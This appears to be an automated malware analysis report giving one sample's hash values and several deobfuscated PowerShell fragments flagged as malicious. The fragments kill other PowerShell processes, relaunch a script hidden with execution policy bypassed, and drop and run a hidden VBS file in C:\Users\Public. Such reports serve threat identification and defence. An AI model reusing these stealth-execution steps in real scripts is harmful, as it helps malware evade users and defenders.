|
Hash | Hash Value |
|---|---|
| MD5 | 3be7d8115257735e4cb4773af2f5408c
|
| Sha1 | 730514b1e2e214cefe6f76e0c3a1559da611bd87
|
| Sha256 | 586671d2c8263999999dfd05ebab5afe6d21a480215c9155eeb1e95db6f51aa4
|
| Sha384 | 8f58df67f602bc11e23f6d23971d1dbe1965adfa8764a48e3a378fb1788bb8f4a231f5560dadd5ad8536565245626c42
|
| Sha512 | 795b3a6c495707982cfb4a2eba420dfe55b47c8bd10827444eafd36377bad2ded0a189778545761797c9a69fd0bb0136f62cc0e90b078ff113ccbdb82d9d0443
|
| SSDeep | 3072:dj07S7Wb80555nLqJiwCIGMQPdi4EDYouZTE8JC+VJdztDafdMSqLduGxy8NLOXJ:iSCuJiwCIp+vYH/
|
| TLSH | A8D47B0AD59033351A18F26E1D96008ED1E3EAD87F3AE64D87D4CDA67A157EF290312F
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "powershell.exe" -ArgumentList @("-NoProfile", "-ExecutionPolicy", "Bypass", "-WindowStyle", "Hidden", "-File", "" & ps1Path & "") -WindowStyle "Hidden"||NL||sh.Run cmd, 0, False" $c = $c -replace @("\|\|NL\|\|", [char] 10) [File]::"WriteAllText"($p + "\script.vbs", $c) Start-Process "wscript" -ArgumentList "" "C:\Users\Public\script.vbs" -WindowStyle "Hidden" |
| Deobfuscated PowerShell | "" Get-Process "powershell" -ErrorAction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden |
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "powershell.exe" -ArgumentList @("-NoProfile", "-ExecutionPolicy", "Bypass", "-WindowStyle", "Hidden", "-File", "" & ps1Path & "") -WindowStyle "Hidden"||NL||sh.Run cmd, 0, False" $c = $c -replace @("\|\|NL\|\|", [char] 10) [File]::"WriteAllText"($p + "\script.vbs", $c) Start-Process "wscript" -ArgumentList "" "C:\Users\Public\script.vbs" -WindowStyle "Hidden" Malicious |
3be7d8115257735e4cb4773af2f5408c > [Deobfuscated PS] > [PowerShell Command] > [PowerShell Command] |
| Deobfuscated PowerShell | "" Get-Process "powershell" -ErrorAction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden Malicious |
3be7d8115257735e4cb4773af2f5408c > [PowerShell Command] |
| Deobfuscated PowerShell | -erroraction "SilentlyContinue" | Where-Object $_."Id" -ne $PID | Stop-Process -Force Start-Sleep -Seconds 3 Start-Process -FilePath "" "powershell.exe" -ArgumentList "" @("-NoProfile", "") @("-ExecutionPolicy", "") @("Bypass", "") @("-WindowStyle", "") @("Hidden", "") @("-File", "") " & ps1Path & " "" -WindowStyle Hidden"||NL||sh.Run cmd, 0, False';$c=$c -replace '\|\|NL\|\|',[char]10;[IO.File]::WriteAllText($p+'\script.vbs',$c);Start-Process wscript -ArgumentList 'C:\Users\Public\script.vbs' -WindowStyle Hidden Malicious |
3be7d8115257735e4cb4773af2f5408c > [PowerShell Command] > [PowerShell Command] |